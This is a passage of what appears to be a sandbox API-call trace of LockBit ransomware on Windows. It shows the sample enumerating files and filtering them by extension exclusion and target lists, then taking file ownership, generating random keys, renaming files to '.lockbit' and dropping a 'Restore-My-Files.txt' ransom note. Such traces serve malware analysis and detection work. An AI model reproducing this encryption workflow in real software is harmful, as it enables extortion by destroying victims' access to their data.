lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="ntldr", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0083.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv") returned=".wmv" [0083.267] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.267] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.267] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.268] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.268] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv.lockbit") returned 90 [0083.268] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.269] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.269] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.269] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.269] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.269] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.269] RtlFreeAnsiString (AnsiString="\\") [0083.269] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.269] malloc (_Size=0x200) returned 0x77d800 [0083.269] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.269] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.269] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.269] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.270] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.270] CloseHandle (hObject=0x3b8) returned 1 [0083.270] free (_Block=0x77d800) [0083.270] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.270] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.271] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.271] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=741220) returned 1 [0083.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.272] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.276] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.277] malloc (_Size=0xca) returned 0x1ff1e60 [0083.277] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0083.286] free (_Block=0x1ff1e60) [0083.286] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.286] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.286] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.286] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7066d541, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7066d541, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e23fe13, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x999e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="title_trans_scene.wmv", cAlternateFileName="")) returned 1 [0083.286] lstrcmpiW (lpString1=".", lpString2="title_trans_scene.wmv") returned -1 [0083.286] lstrcmpiW (lpString1="..", lpString2="title_trans_scene.wmv") returned -1 [0083.286] PathFindExtensionW (pszPath="title_trans_scene.wmv") returned=".wmv" [0083.286] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.286] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.287] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.287] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="ntldr", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="bootsect.bak", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="autorun.inf", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="thumbs.db", lpString2="title_trans_scene.wmv") returned -1 [0083.288] lstrcmpiW (lpString1="iconcache.db", lpString2="title_trans_scene.wmv") returned -1 [0083.288] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0083.288] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv") returned=".wmv" [0083.288] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.288] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.288] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.289] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.289] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv.lockbit") returned 86 [0083.289] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.290] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.290] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.291] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.291] RtlFreeAnsiString (AnsiString="\\") [0083.291] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.291] malloc (_Size=0x200) returned 0x77d800 [0083.291] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.291] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.291] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.291] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.291] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.292] CloseHandle (hObject=0x3b8) returned 1 [0083.292] free (_Block=0x77d800) [0083.292] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.292] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.292] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.292] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=629220) returned 1 [0083.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.293] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.299] malloc (_Size=0xc2) returned 0x1ff1e60 [0083.299] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0083.306] free (_Block=0x1ff1e60) [0083.306] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.306] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.306] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.306] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70705ab5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70705ab5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa16e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Trans_Scene_PAL.wmv", cAlternateFileName="")) returned 1 [0083.306] lstrcmpiW (lpString1=".", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.306] lstrcmpiW (lpString1="..", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.306] PathFindExtensionW (pszPath="Title_Trans_Scene_PAL.wmv") returned=".wmv" [0083.307] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.307] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.307] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="ntldr", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] lstrcmpiW (lpString1="iconcache.db", 